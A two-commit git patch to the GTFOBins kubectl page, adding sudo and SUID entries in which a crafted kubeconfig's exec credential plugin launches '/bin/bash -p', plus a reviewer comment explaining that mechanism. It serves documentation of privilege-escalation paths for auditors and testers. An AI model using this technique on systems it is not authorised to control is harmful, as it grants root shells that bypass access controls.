From e057abb5f3a22f8b9eda1f1cd04118513e301737 Mon Sep 17 00:00:00 2001
From: Rolix <82376603+Rolix44@users.noreply.github.com>
Date: Fri, 20 Jun 2025 17:34:12 +0200
Subject: [PATCH 1/2] Update kubectl.md Add privileged shell
---
_gtfobins/kubectl.md | 64 ++++++++++++++++++++++++++++++++++++++++++--
1 file changed, 62 insertions(+), 2 deletions(-)
diff --git a/_gtfobins/kubectl.md b/_gtfobins/kubectl.md
index 72cbe468..2eff897c 100644
--- a/_gtfobins/kubectl.md
+++ b/_gtfobins/kubectl.md
@@ -1,16 +1,76 @@ --- -description: It serves files from a specified directory via HTTP, i.e., `http://:4444/x/`. functions: file-upload: - code: | LFILE=dir_to_serve kubectl proxy --address=0.0.0.0 --port=4444 --www=$LFILE --www-prefix=/x/ + description: "It serves files from a specified directory via HTTP, i.e., `http://:4444/x/`." suid: - code: | LFILE=dir_to_serve ./kubectl proxy --address=0.0.0.0 --port=4444 --www=$LFILE --www-prefix=/x/ - sudo: + description: "It serves files from a specified directory via HTTP, i.e., `http://:4444/x/`." + - code: |- + cat << EOF > /tmp/config + apiVersion: v1 + clusters: + - cluster: + server: https://test + name: kubernetes + contexts: + - context: + cluster: kubernetes + user: kubernetes-admin + name: kubernetes-admin@kubernetes + current-context: kubernetes-admin@kubernetes + kind: Config + preferences: {} + users: + - name: kubernetes-admin + user: + exec: + apiVersion: client.authentication.k8s.io/v1 + command: /bin/bash + args: + - "-p" + - "-c" + - "/bin/bash -p /dev/tty 2>/dev/tty" + interactiveMode: Always + EOF + ./kubectl get pods --kubeconfig=/tmp/config + description: "It pops a new privileged shell using custom configuration" + sudo: - code: | LFILE=dir_to_serve sudo kubectl proxy --address=0.0.0.0 --port=4444 --www=$LFILE --www-prefix=/x/ + description: "It serves files from a specified directory via HTTP, i.e., `http://:4444/x/`." 
+ - code: |- + cat << EOF > /tmp/config + apiVersion: v1 + clusters: + - cluster: + server: https://test + name: kubernetes + contexts: + - context: + cluster: kubernetes + user: kubernetes-admin + name: kubernetes-admin@kubernetes + current-context: kubernetes-admin@kubernetes + kind: Config + preferences: {} + users: + - name: kubernetes-admin + user: + exec: + apiVersion: client.authentication.k8s.io/v1 + command: /bin/bash + args: + - "-p" + - "-c" + - "/bin/bash -p /dev/tty 2>/dev/tty" + interactiveMode: Always + EOF + ./kubectl get pods --kubeconfig=/tmp/config + description: "It pops a new privileged shell using custom configuration" --- From 95832ff0277ba8e21bbe8eb82bec1b2d276a777a Mon Sep 17 00:00:00 2001 From: Rolix <82376603+Rolix44@users.noreply.github.com> Date: Fri, 20 Jun 2025 17:56:43 +0200 Subject: [PATCH 2/2] Update kubectl.md --- _gtfobins/kubectl.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/_gtfobins/kubectl.md b/_gtfobins/kubectl.md index 2eff897c..6753a3d4 100644 --- a/_gtfobins/kubectl.md +++ b/_gtfobins/kubectl.md @@ -71,6 +71,6 @@ functions: - "/bin/bash -p /dev/tty 2>/dev/tty" interactiveMode: Always EOF - ./kubectl get pods --kubeconfig=/tmp/config + sudo kubectl get pods --kubeconfig=/tmp/config description: "It pops a new privileged shell using custom configuration" ---
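Review bot: The description added to the two new entries in the first hunk (under `suid` and `sudo`), `It pops a new privileged shell using custom configuration`, does not name the mechanism, which is what a reader auditing sudoers rules or SUID binaries needs. What the heredoc shows is a kubeconfig whose `users[].user.exec` credential plugin points at `/bin/bash`; kubectl appears to run that `command` to obtain credentials, so the placeholder `server: https://test` presumably never has to be reachable. I would reword the description along the lines of `kubectl runs the exec credential plugin named in the supplied kubeconfig, so a SUID or sudo-allowed kubectl that accepts a caller-chosen --kubeconfig executes that command with the elevated privileges.` Separately, the `sudo:` key is removed and re-added with no visible text change, which suggests trailing whitespace was introduced on that line; worth confirming and dropping it.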